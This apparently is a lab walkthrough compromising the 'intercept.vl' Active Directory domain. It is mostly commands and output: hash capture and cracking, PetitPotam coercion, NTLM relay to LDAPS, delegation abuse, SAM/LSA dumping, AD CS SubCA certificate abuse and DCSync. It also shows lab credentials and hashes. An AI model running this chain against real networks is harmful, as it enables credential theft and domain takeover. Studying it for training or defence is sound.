  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

<SNIF>

[!] Error starting TCP server on port 21, check permissions or other servers running.
[SMB] NTLMv2-SSP Client   : 10.10.202.54
[SMB] NTLMv2-SSP Username : INTERCEPT\Kathryn.Spencer
[SMB] NTLMv2-SSP Hash     : Kathryn.Spencer::INTERCEPT:3c715996a067a873:C8AEFC889DC694DEA73FF54D835AED5A:010100000000000000F7EDFF4CB9DB01036D385A42F6D0490000000002000800510039004400350001001E00570049004E002D0058004200450030004E0047004400440033004600540004003400570049004E002D0058004200450030004E004700440044003300460054002E0051003900440035002E004C004F00430041004C000300140051003900440035002E004C004F00430041004C000500140051003900440035002E004C004F00430041004C000700080000F7EDFF4CB9DB01060004000200000008003000300000000000000000000000002000002527C21C90E08E8970AA5B6BE1D741B88F53D12507CFF8AC16F533BB15E699560A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0035002E00340038000000000000000000

Cracking

❯ hashcat -m 5600 kathryn.spencer.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

KATHRYN.SPENCER::INTERCEPT:3c715996a067a873:c8aefc889dc694dea73ff54d835aed5a:010100000000000000f7edff4cb9db01036d385a42f6d0490000000002000800510039004400350001001e00570049004e002d0058004200450030004e0047004400440033004600540004003400570049004e002d0058004200450030004e004700440044003300460054002e0051003900440035002e004c004f00430041004c000300140051003900440035002e004c004f00430041004c000500140051003900440035002e004c004f00430041004c000700080000f7edff4cb9db01060004000200000008003000300000000000000000000000002000002527c21c90e08e8970aa5b6be1d741b88f53d12507cff8ac16f533bb15e699560a0010000000000000000000000000000000000009001c0063006900660073002f00310030002e0038002e0035002e00340038000000000000000000:Chocolate1

Credentials found: KATHRYN.SPENCER:Chocolate1

Default enumeration with valid credentials:

Retrieved valid usernames
Not bruteforce/password spraying successfully (empty,username as password)
Not asreproast users
Not kerberoast users
Not ADCS vulnerable templates
- Found PKI Enrollment Server: DC01.intercept.vl
- Found CN: intercept-DC01-CA
kathryn.spencer possesses MachineAccountQuota: 10 .
Coerce_plus by netexec
- VULNERABLE, DFSCoerce
- VULNERABLE, PetitPotam
- VULNERABLE, PrinterBug
- VULNERABLE, MSEven

Discovering a exploitable LDAP misconfiguration

LDAP Signing NOT Enforced!
LDAPS Channel Binding is set to "NEVER"

❯ nxc ldap 10.10.141.165-166 -u kathryn.spencer  -p 'Chocolate1' -M ldap-checker
SMB         10.10.202.53    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False)
LDAP        10.10.202.53    389    DC01             [+] intercept.vl\kathryn.spencer:Chocolate1 
LDAP-CHE... 10.10.202.53    389    DC01             LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.202.53    389    DC01             LDAPS Channel Binding is set to "NEVER"

Discovering a WebClient Service available

#Enumerate WebClient Using NetExec
❯ nxc smb 10.10.141.165-166 -u kathryn.spencer  -p 'Chocolate1' -M webdav
SMB         10.10.202.53    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False)
SMB         10.10.202.54    445    WS01             [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:intercept.vl) (signing:False) (SMBv1:False)
SMB         10.10.202.53    445    DC01             [+] intercept.vl\kathryn.spencer:Chocolate1 
SMB         10.10.202.54    445    WS01             [+] intercept.vl\kathryn.spencer:Chocolate1 
WEBDAV      10.10.202.54    445    WS01             WebClient Service enabled on: 10.10.202.54

#Enumerate WebClient Using webclientservicescanner 
❯ webclientservicescanner intercept.vl/kathryn.spencer:Chocolate1@10.10.141.165
WebClient Service Scanner v0.1.0 - pixis (@hackanddo) - Based on @tifkin_ idea

[10.10.202.53] STOPPED
[10.10.202.54] RUNNING

#Enumerate Webclient Using GetWebDAVStatus.exe
GetWebDAVStatus.exe 10.10.141.166

WebClient Service enabled on: 10.10.141.166

Abusing NTLM Relay Attack

To successfully carry out this attack, the environment must have the following misconfigurations:

LDAP Signing is NOT enforced
LDAPS Channel Binding is set to "NEVER"
MachineAccountQuota > 0 (allows low-privileged users to create computer accounts)
PetitPotam vulnerability is present
Valid NetBIOS name resolution via Responder
Intranet zone conditions has to be meet.
- Which means add our Computer to the domain using the NetBIOS provided by Responder

Running responder to generate Netbios

/usr/share/responder/Responder.conf > SMB = Off and HTTP = Off

❯ sudo responder -I eth0 -w
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

  
[+] Current Session Variables:
    Responder Machine Name     [WIN-5XYKF0PVHHL]
    Responder Domain Name      [R6XA.LOCAL]
    Responder DCE-RPC Port     [45461]

Adding our machine to the domain’s DNS records

❯ python3 ~/Documents/tools/krbrelayx/dnstool.py -u 'intercept.vl\KATHRYN.SPENCER' -p Chocolate1 --action add --record WIN-5XYKF0PVHHL.intercept.vl --data 10.8.5.48 --type A 10.10.141.165
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Coercing Authentication

❯ sudo python3 PetitPotam.py -d "intercept.vl" -u "kathryn.spencer" -p "Chocolate1"  WIN-5XYKF0PVHHL@80/Intrusionz3r0 10.10.141.166
Trying pipe lsarpc
[-] Connecting to ncacn_np:10.10.141.166[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

Output

❯ impacket-ntlmrelayx -t ldaps://DC01.intercept.vl --delegate-access -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] HTTPD(80): Connection from 10.10.141.166 controlled, attacking target ldaps://DC01.intercept.vl
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] HTTPD(80): Authenticating against ldaps://DC01.intercept.vl as INTERCEPT/WS01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] HTTPD(80): Connection from 10.10.141.166 controlled, attacking target ldaps://DC01.intercept.vl
[*] HTTPD(80): Client requested path: /intrusionz3r0/pipe/srvsvc
[*] Attempting to create computer in: CN=Computers,DC=intercept,DC=vl
[*] Adding new computer with username: JDJUKOKR$ and password: k4f6$32#HX2#$/{ result: OK
[*] Delegation rights modified succesfully!
[*] JDJUKOKR$ can now impersonate users on WS01$ via S4U2Proxy
<SNIF>

Abusing Resource Based Constrained Delegation

❯ impacket-rbcd -delegate-from 'JDJUKOKR$' -delegate-to 'WS01$' -action 'write' 'intercept.vl/JDJUKOKR$:k4f6$32#HX2#$/{'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Accounts allowed to act on behalf of other identity:
[*]     JDJUKOKR$    (S-1-5-21-3031021547-1480128195-3014128932-4101)
[*] JDJUKOKR$ can already impersonate users on WS01$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     JDJUKOKR$    (S-1-5-21-3031021547-1480128195-3014128932-4101)

Requesting Ticket Granting Ticket using S4U

❯ impacket-getST 'intercept.vl/JDJUKOKR$:k4f6$32#HX2#$/{' -spn 'cifs/ws01.intercept.vl' -impersonate Administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache

Dumping SAM database and LSA Secrets

❯ KRB5CCNAME='Administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache' impacket-secretsdump -k -no-pass WS01.intercept.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x04718518c7f81484a5ba5cc7f16ca912
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:831cbc509daa37aff98250b635e7f482:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:48daaaaa9654c3754d42b40e292ba63f:::
[*] Dumping cached domain logon information (domain/username:hash)
INTERCEPT.VL/Simon.Bowen:$DCC2$10240#Simon.Bowen#35e1bb1dbd5f474e21819bb03ae5d103: (2023-06-27 20:07:12)
INTERCEPT.VL/Kathryn.Spencer:$DCC2$10240#Kathryn.Spencer#4d8e1b44d30998c82793a9808b959d91: (2023-06-29 11:51:33)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
INTERCEPT\WS01$:plain_password_hex:a5acf58651f67d4a49babcc008c3894b20ed9193d53362b81deadc3136844af97c775d4074d3c5f9c5ba5c0c55cad0d2f1992739b2a73921b1c8eaddebb652e0fe278f269dbda7a47f1e0fd8d2e816bcfa745344dcbb466e8c213a0d195b1d9e57ed4ff0888e905733fc959ef6c1dbd4e6001b38267fe3aa235834b75157d5ca4bd6cf8aba19b3a31afd5613c0acb1ec1365d5b737de435530792888678b811b7a060cf5f07313e216d1f3b90de551264f99f95c014fddc0ff738263d3eea3d0d75d8431b431d3e225787869658140e269405dd4a9c83d13fffac52e50a3d7402735d1b29f71c356ff7106a5088baff3
INTERCEPT\WS01$:aad3b435b51404eeaad3b435b51404ee:ff4e454b3439375b1a4d88b732ce4232:::
[*] DefaultPassword 
intercept.vl\Kathryn.Spencer:Chocolate1
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xf6f65580470c139808ab7f0ffb709773d1531dc3
dpapi_userkey:0x24122e60857c28b7f2e6bdd138f22e3e4ddd58f3
[*] NL$KM 
 0000   4C A8 6F 51 3B B6 E6 22  0B A7 7A FD 4F 32 EA BC   L.oQ;.."..z.O2..
 0010   78 7A 98 1E DD 83 F2 70  37 73 9B 6C D0 03 9B 7F   xz.....p7s.l....
 0020   FA EA 8D AF A0 84 F9 0D  24 17 3C C9 97 3D 8A E7   ........$.<..=..
 0030   BC EE 5D B7 20 73 02 B7  E1 A7 62 E6 4D 8E F8 ED   ..]. s....b.M...
NL$KM:4ca86f513bb6e6220ba77afd4f32eabc787a981edd83f27037739b6cd0039b7ffaea8dafa084f90d24173cc9973d8ae7bcee5db7207302b7e1a762e64d8ef8ed
[*] _SC_HelpdeskService 
Simon.Bowen@intercept.vl:b0OI_fHO859+Aw
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

Credentials found: Simon.Bowen:b0OI_fHO859+Aw

Compromise Domain Controller

Adding simon.bowen to ca-managers domain group

❯ bloodyAD --host dc01 -d intercept.vl -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' add groupMember 'ca-managers' 'Simon.Bowen'
[+] Simon.Bowen added to ca-managers

Enabling SubCA Template

❯ certipy-ad ca -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.141.165 -ca intercept-DC01-CA -enable-template 'SubCA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'intercept-DC01-CA'

Adding officer on intercept-DC01-CA

❯ certipy-ad ca -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.141.165 -ca intercept-DC01-CA -add-officer Simon.Bowen
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Simon.Bowen' on 'intercept-DC01-CA'

Requesting Administrator certificate using Subject Alternative Name (SAN)

❯ certipy-ad req -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.141.165 -ca intercept-DC01-CA -template SubCA -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 5
Would you like to save the private key? (y/N) y
[*] Saved private key to 5.key
[-] Failed to request certificate

Although initial enrollment failed due to template restrictions, the request was submitted and manually approved via:

Approving administrator certificate

❯ certipy-ad ca -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.141.165 -ca intercept-DC01-CA -issue-request 5
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate

Retrieving Administrator certificate

❯ certipy-ad req -u 'Simon.Bowen' -p 'b0OI_fHO859+Aw' -dc-ip 10.10.141.165 -ca intercept-DC01-CA -retrieve 5
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 5
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Loaded private key from '5.key'
[*] Saved certificate and private key to 'administrator.pfx'

Requesting Administrator's Ticket Granting Ticket

❯ certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.141.165 -user Administrator -domain intercept.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@intercept.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@intercept.vl': aad3b435b51404eeaad3b435b51404ee:ad95c338a6cc5729ae7390acbe0ca91f

Performing DCSync Attack

❯ impacket-secretsdump intercept.vl/administrator@10.10.141.165 -hashes aad3b435b51404eeaad3b435b51404ee:ad95c338a6cc5729ae7390acbe0ca91f -just-dc-user krbtgt
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6ff6959c0c141860804532b61d7cbe2f:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:1c1047fe5fa8d7dc5810b174e13d28a17c8afb7ddd9c56577038d088ebb46b38
krbtgt:aes128-cts-hmac-sha1-96:04e31eb0a8c63d0f972e12d4c744331a
krbtgt:des-cbc-md5:852a92ab152cb952
[*] Cleaning up...